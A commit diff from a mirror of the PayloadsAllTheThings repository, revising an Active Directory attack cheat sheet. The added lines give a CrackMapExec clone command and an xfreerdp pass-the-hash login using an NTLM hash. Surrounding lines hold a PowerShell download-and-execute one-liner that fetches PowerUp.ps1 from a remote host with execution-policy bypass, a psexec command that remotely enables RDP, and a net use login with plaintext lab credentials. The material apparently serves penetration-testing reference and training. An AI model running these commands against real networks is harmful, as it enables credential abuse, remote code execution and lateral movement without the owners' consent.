mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2025-02-21 06:06:06 +00:00
AD - refactor part3
This commit is contained in:
parent
1feccf84cb
commit
c5bbe88372
@ -29,6 +29,9 @@
|
||||
* [BloodHound](https://github.com/BloodHoundAD/BloodHound)
|
||||
* [AdExplorer](https://docs.microsoft.com/en-us/sysinternals/downloads/adexplorer)
|
||||
* [CrackMapExec](https://github.com/byt3bl33d3r/CrackMapExec)
|
||||
```bash
|
||||
git clone --recursive https://github.com/byt3bl33d3r/CrackMapExec
|
||||
```
|
||||
* [PowerSploit](https://github.com/PowerShellMafia/PowerSploit/tree/master/Recon)
|
||||
```powershell
|
||||
powershell.exe -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://10.11.0.47/PowerUp.ps1'); Invoke-AllChecks"
|
||||
|
@ -68,6 +68,11 @@ or with psexec(sysinternals)
|
||||
psexec \\machinename reg add "hklm\system\currentcontrolset\control\terminal server" /f /v fDenyTSConnections /t REG_DWORD /d 0
|
||||
```
|
||||
|
||||
For Server 2012 R2, Win8.1+
|
||||
```
|
||||
xfreerdp /u:offsec /d:win2012 /pth:88a405e17c0aa5debbc9b5679753939d /v:192.168.1.12
|
||||
```
|
||||
|
||||
## Netuse (Windows)
|
||||
```
|
||||
net use \\ordws01.cscou.lab /user:CSCOU\jarrieta nastyCutt3r
|
||||
|
Loading…
Reference in New Issue
Block a user